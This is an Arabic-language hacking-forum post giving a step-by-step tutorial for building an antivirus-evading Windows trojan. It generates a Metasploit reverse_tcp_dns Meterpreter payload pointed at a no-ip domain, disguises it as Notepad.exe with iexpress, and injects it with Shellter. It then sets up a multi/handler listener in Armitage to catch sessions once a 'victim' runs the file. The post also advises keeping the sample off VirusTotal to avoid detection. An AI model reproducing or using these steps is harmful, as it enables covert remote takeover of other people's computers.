:: vBspiders Professional Network :: - تجاوز قيود الرفع و اختراق السيرفر حصريا

السلام عليكم.
في هذا الشرح سنقوم بانشاء طورجان متربريتر مشفر باستعمال اسم دومين. المرحلة الأولى حول طريقة انشاء سيرفر dns (انا استعمل نو اي بي no-ip) .

و المرحلة الثانية حول انشاء ملف تنفيدي و ثالثا استخدام كلا الملفين (الملف التنفيدي ويندوز + السيرفر ) و اخيرا التصنت باستعمال الارميتاج على سيرفر و بورت الاختراق.
الشرح بسيط ان شاء الله كلشي يستفيد
الأدوات التي تحتاج اليها:

كالي لينكس https://www.kali.org/

ويندوز :)

حساب نو ايبي مربوط بدومين http://www.noip.com/

بورت الاخراق مفتوح في الراوتر

برنامج شيلتر https://www.shellterproject.com/download/

الجزء الأول :انشاء سيرفر دي ان اس باستعمال الكالي

افتح برنامج الميتاسبولت في شاشة الأوامر باستعمال الأمر

كود:

msfconsole

نختار السيرفر التالي بالامر

كود:

use payload/windows/meterpreter/reverse_tcp_dns

نأمر الميتا لاظهار خصائص السيرفر

كود:

show options

يجب ان تضع
lhost = الهوست الذي تم انشاءه مع النو اي بي بدون البرتكول http://
lport = رقم البورت الذي فتحته في الراتور
ثم نضع الأمر التالي لاظهار خصائص انشاء السيرفر

كود:

generate -h

ثم الأمر التالي لانشاء السيرفر

كود:

generate -f DNS -p windows -t raw

مع DNS= اسم السيرفر الذي تريد
الأن نغلق شاشة الأوامر و نفتح مدير الملفات سنجد السرفر الذي تم انشاءه في home folder

الجزء الثاني: انشاء الملف التنفيذي في وندوز

اختر الخاصية التي تناسبك (مع العلم أن برنامج شيلتر ليس متوافق مع برامج 64 بايت) ه
لأصحاب 32 بايت نذهب الى

كود:

C:\Windows\System32\iexpress.exe و كليك يمين و نشغله كمدير run as administrator

لمن لديه بلاتفورم 64 بايت ننتقل الى

كود:

C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)

نختار
Create new Self Extraction Directive File ثم next. ثمnext on the Package Purpose page
نضع أي شيء في عنوان الباكتاج مثل
Ex: Notepad.exe
No Prompt, اضغط next
Do not display a license, اضغط next
اغضط add و اختر اي برنامج في النظام أنا مثلا اخترت Notepad.exe في C:\Windows\System32. اضغط next .
اضغط drop arrow و اختر اسم مثل الذي اخترت في الأول
نغضط على التصفح browse و نكتب اسم البرنامج و مساره مع تفعيل خاصية Hide File Extracting Progress Animation from user. Click Next.
اختر No restart و اضغط next --> next --> next الى انشاء الملف ثم انهاء Finish. .

الجزء الثالث: استخدام كلا الملفين لانشاء الطورجان الخاص بنا

افتح مجلد شيلتر و افتح البرنامج كمدير
+ ضع A لـ Auto.
+ ضع N لـ No.
اختر مسار البرنامج الذي قمنا بانشاءه في الجزء الثاني و أترك البرنامج ليقوم بشغله أقل من دقيقة، و عندما يطلب مسار السيرفر ضع مكان السيرفر من الجزء 1 بعد نسخه للجهاز طبعا
+ ضع C لـ custom.
+ ضع مسار السيرفر.
+ ضع N لـ No reflective DLL loader.
اضغط enter وضع البرنامج يعمل عندما نحصل على رسالة Injection Verified سيكون لديك طورجان مشفر مبروك

الجزء الرابع : التصنت على الأرميتاج

تستطيع استعمال ارميتاج او كوبالت سترايك أو حتى الميتا حسب الرغبة أنا أستعمل ارميتاج
نعود لنظام الكالي
نفتح شاشة الأوامر و نكتب

كود:

msfupdate

للتحديث
و اتبع التالي

كود:

apt-get install armitage

كود:

msfdb init

كود:

Armitage

اضغط Connect
اضغط Yes
عندما تفتح معنا شاشة الارميتاج أو الميتا نكتب التالي

كود:

use exploit/multi/handler

كود:

set lhost 0.0.0.0

مع lhost عنوان الايبي الخارجي

كود:

set lport 4444

مع lport رقم البورت الدي اخترناه للسيرفر

كود:

set payload windows/meterpreter/reverse tcp dns

كود:

set exitonsession false

ان اردت اضافة الأمر

كود:

set autorunscript migrate -f

كود:

set prependmigrate True

أخيرا

كود:

exploit -j

بعد ارسال الطرورجان و تشغيله من طرف الضحية مبروك عليكم
ملاحظة:
لا ترفع الطرورجان على مواقع الفحص التي ترسل القيم مثل فايروس تاوتال
- سيرفر زعما payload
- موضوع ليس منقول بل مخدوم
شكرا على المتابعة، اي استفسار تفضلوا